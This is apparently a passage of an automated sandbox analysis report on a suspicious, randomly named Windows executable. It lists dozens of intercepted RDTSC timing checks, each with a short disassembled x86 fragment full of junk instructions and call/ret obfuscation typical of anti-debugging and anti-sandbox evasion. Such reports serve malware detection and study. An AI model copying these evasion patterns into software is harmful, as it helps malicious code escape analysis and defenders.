Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1714207 second address: 171420B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 171420B second address: 1714224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FEEDCB1F6D8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 jg 00007FEEDCB1F6E4h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1714224 second address: 1714291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEEDCB2F2E6h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FEEDCB2F2E8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007FEEDCB2F2ECh 0x0000002b push 00000000h 0x0000002d mov edi, 24C10A80h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FEEDCB2F2E8h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e xchg eax, ebx 0x0000004f pushad 0x00000050 jmp 00007FEEDCB2F2EBh 0x00000055 push ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1714CC6 second address: 1714CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1714CCA second address: 1714CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1714CD0 second address: 1714D2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007FEEDCB1F6E0h 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jng 00007FEEDCB1F6D6h 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FEEDCB1F6D8h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 mov dword ptr [ebp+1245A279h], edi 0x0000003b push 00000000h 0x0000003d add si, AB01h 0x00000042 push 00000000h 0x00000044 mov esi, edi 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 jo 00007FEEDCB1F6D8h 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17157A3 second address: 17157D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b mov dword ptr [ebp+122D2009h], esi 0x00000011 mov edi, edx 0x00000013 popad 0x00000014 push 00000000h 0x00000016 add dword ptr [ebp+122D2250h], eax 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D3442h], edi 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 jl 00007FEEDCB2F2E8h 0x0000002d push edi 0x0000002e pop edi 0x0000002f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1716176 second address: 1716181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FEEDCB1F6D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1716181 second address: 17161A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FEEDCB2F2F7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1716BC2 second address: 1716BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17175BE second address: 17175C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17175C4 second address: 17175CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17175CE second address: 1717606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1C4Eh], ebx 0x00000012 adc si, 22A2h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b add dword ptr [ebp+122D2CE6h], esi 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1717606 second address: 171760C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171B6F2 second address: 171B702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171698B second address: 1716994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171DCBB second address: 171DCC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1720D52 second address: 1720D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1723D48 second address: 1723DBD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEEDCB2F2ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FEEDCB2F2E8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D2198h] 0x0000002d mov edi, dword ptr [ebp+122D2F57h] 0x00000033 push 00000000h 0x00000035 mov edi, dword ptr [ebp+122D1CDEh] 0x0000003b push 00000000h 0x0000003d jmp 00007FEEDCB2F2F4h 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FEEDCB2F2F1h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1723DBD second address: 1723DC7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1723DC7 second address: 1723DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1717F13 second address: 1717F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1724CB0 second address: 1724CB6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1724CB6 second address: 1724CEA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007FEEDCB1F6D6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d xor dword ptr [ebp+122D1F55h], ebx 0x00000013 push 00000000h 0x00000015 movsx edi, bx 0x00000018 push 00000000h 0x0000001a jnl 00007FEEDCB1F6DCh 0x00000020 xchg eax, esi 0x00000021 pushad 0x00000022 push ebx 0x00000023 push edi 0x00000024 pop edi 0x00000025 pop ebx 0x00000026 jnp 00007FEEDCB1F6DCh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1725AD5 second address: 1725ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1725ADA second address: 1725B33 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEEDCB1F6D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FEEDCB1F6DCh 0x00000012 nop 0x00000013 jc 00007FEEDCB1F6DCh 0x00000019 and ebx, dword ptr [ebp+122D28B3h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007FEEDCB1F6D8h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 0000001Ah 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b stc 0x0000003c push 00000000h 0x0000003e cmc 0x0000003f mov edi, dword ptr [ebp+122D1BF8h] 0x00000045 xchg eax, esi 0x00000046 push edx 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171DEBA second address: 171DEBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171CE1A second address: 171CE1F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171DEBF second address: 171DEC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FEEDCB2F2E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1726C7E second address: 1726C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1720E72 second address: 1720E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1720E77 second address: 1720E7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1721EE6 second address: 1721EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1721EEA second address: 1721F08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1721F08 second address: 1721F12 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1727B9A second address: 1727BCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FEEDCB1F6E5h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1720E7C second address: 1720F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEEDCB2F2E6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+122D20CAh], esi 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007FEEDCB2F2E8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 push esi 0x00000038 mov ebx, dword ptr [ebp+122D1F38h] 0x0000003e pop ebx 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 sub dword ptr [ebp+12452238h], edx 0x0000004c mov eax, dword ptr [ebp+122D0FA1h] 0x00000052 jmp 00007FEEDCB2F2F9h 0x00000057 push FFFFFFFFh 0x00000059 mov dword ptr [ebp+122D2275h], edi 0x0000005f nop 0x00000060 jne 00007FEEDCB2F2F0h 0x00000066 push eax 0x00000067 pushad 0x00000068 jne 00007FEEDCB2F2E8h 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FEEDCB2F2F7h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1724D97 second address: 1724DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1725CF3 second address: 1725D1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FEEDCB2F2E6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1726D97 second address: 1726DA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1724DA1 second address: 1724DB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jl 00007FEEDCB2F2E6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1727D05 second address: 1727DB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FEEDCB1F6D8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov ebx, 5E50AF81h 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov di, bx 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a and ebx, 557F65C7h 0x00000040 sub dword ptr [ebp+122D2F3Dh], eax 0x00000046 mov eax, dword ptr [ebp+122D0FA9h] 0x0000004c push 00000000h 0x0000004e push ecx 0x0000004f call 00007FEEDCB1F6D8h 0x00000054 pop ecx 0x00000055 mov dword ptr [esp+04h], ecx 0x00000059 add dword ptr [esp+04h], 0000001Dh 0x00000061 inc ecx 0x00000062 push ecx 0x00000063 ret 0x00000064 pop ecx 0x00000065 ret 0x00000066 xor dword ptr [ebp+122D3083h], edi 0x0000006c push FFFFFFFFh 0x0000006e mov edi, eax 0x00000070 nop 0x00000071 pushad 0x00000072 jmp 00007FEEDCB1F6E0h 0x00000077 pushad 0x00000078 jmp 00007FEEDCB1F6E2h 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1725D1A second address: 1725D34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEEDCB2F2F2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1726DA8 second address: 1726DB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1724DB8 second address: 1724DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1726DB6 second address: 1726DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 172402D second address: 1724032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1728DBE second address: 1728E5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FEEDCB1F6D8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+122D29A7h] 0x0000002d mov ebx, dword ptr [ebp+122D36C6h] 0x00000033 push dword ptr fs:[00000000h] 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007FEEDCB1F6D8h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 sbb edi, 7CA09090h 0x0000005a mov dword ptr fs:[00000000h], esp 0x00000061 movzx ebx, cx 0x00000064 sbb bx, 2A2Eh 0x00000069 mov eax, dword ptr [ebp+122D0211h] 0x0000006f js 00007FEEDCB1F6DCh 0x00000075 push FFFFFFFFh 0x00000077 mov edi, dword ptr [ebp+122D2F68h] 0x0000007d nop 0x0000007e jbe 00007FEEDCB1F6E4h 0x00000084 push eax 0x00000085 push edx 0x00000086 push ebx 0x00000087 pop ebx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1728E5D second address: 1728E84 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jg 00007FEEDCB2F301h 0x00000011 pushad 0x00000012 jmp 00007FEEDCB2F2F3h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 172E753 second address: 172E757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173245C second address: 1732462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1732462 second address: 1732470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FEEDCB1F6DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1732470 second address: 1732474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1732474 second address: 173248A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FEEDCB1F6D6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173248A second address: 173248E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173248E second address: 17324A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FEEDCB1F6D6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16D6E2E second address: 16D6E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16D6E32 second address: 16D6E4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DCh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FEEDCB1F6D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16D6E4E second address: 16D6E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16D6E52 second address: 16D6E61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1739951 second address: 1739969 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FEEDCB2F2EEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16CB029 second address: 16CB044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FEEDCB1F6EAh 0x0000000c pushad 0x0000000d jne 00007FEEDCB1F6D6h 0x00000013 jl 00007FEEDCB1F6D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173AE83 second address: 173AE94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB2F2EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173AE94 second address: 173AE98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173AE98 second address: 173AEAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FEEDCB2F2E6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173AEAD second address: 173AEB7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173AEB7 second address: 173AEBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173B009 second address: 173B045 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FEEDCB1F6E7h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FEEDCB1F6E5h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173B045 second address: 173B057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
